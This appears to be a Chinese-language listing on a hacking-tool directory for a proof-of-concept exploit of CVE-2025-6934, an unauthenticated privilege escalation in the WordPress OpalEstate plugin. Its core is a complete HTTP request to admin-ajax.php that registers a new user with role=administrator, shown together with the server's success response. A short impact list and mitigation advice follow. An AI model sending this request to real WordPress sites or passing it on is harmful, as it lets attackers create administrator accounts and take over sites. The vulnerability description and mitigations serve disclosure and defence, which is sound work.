Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-6934 — CVE-2025-6934 POC | Kitploit
工具/GitHubGitHub/mrjhaxcore/cve-2025-6934
权限提升漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试
GitHubmrjhaxcore/cve-2025-6934

CVE-2025-6934

CVE-2025-6934 POC

查看仓库
111年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

🚨 WordPress OpalEstate 插件 - 未认证权限提升漏洞

🔎 描述

WordPress 的 OpalEstate 插件在其 AJAX 注册处理程序中存在一个严重漏洞,允许未认证用户注册为管理员。

问题在于 opalestate_register_form AJAX 动作中对 role 参数的不安全处理,该动作通过 admin-ajax.php 公开暴露。攻击者只需提交有效的 nonce 和 role=administrator 字段即可提升权限,导致网站完全沦陷。

CVE ID: CVE-2025-6934 CVSS Score: 9.8 (Critical) 发布日期:2025 年 6 月 30 日

📋 漏洞端点 / POC

POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1 Host: localhost Content-Length: 231 sec-ch-ua-platform: "Windows" Accept-Language: en-US,en;q=0.9 sec-ch-ua: "Chromium";v="133", "Not(A:Brand";v="99" sec-ch-ua-mobile: ?0 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/wordpress/?page_id=16 Accept-Encoding: gzip, deflate, br Cookie: wp-settings-time-1=1750938057; wp-settings-1=libraryContent%3Dbrowse; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; kawuda_cookie=1751024383267404614; PHPSESSID=rsbi6r8gs523c35v319f1jf4tt Connection: keep-alive

username=mrjtest&email=mrjtest%40gmail.com&password=123&password1=123&role=administrator&confirmed_register=on&opalestate-register-nonce=db20fa048c&_wp_http_referer=%2Fwordpress%2F%3Fpage_id%3D16&ajax=1&action=opalestate_register_form

Response

HTTP/1.1 200 OK Date: Wed, 02 Jul 2025 14:19:23 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Pragma: no-cache Content-Length: 53 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/json; charset=UTF-8

{"status":true,"redirect":"/wordpress/?page_id=16"}

影响

完全接管 WordPress 网站 创建未认证管理员账户 持久后门访问 可能导致权限链利用及插件/主题利用

🛡️ 缓解措施 从用户可控输入中移除或清理 role 参数。 强制在服务器端分配角色(例如,仅限订阅者)。 使用 wp_insert_user() 或 wp_create_user() 并锁定角色。 在处理敏感操作前验证用户权限。 修补插件或禁用非必要的 AJAX 注册功能。

由 MRJ HAXCORE

下载工具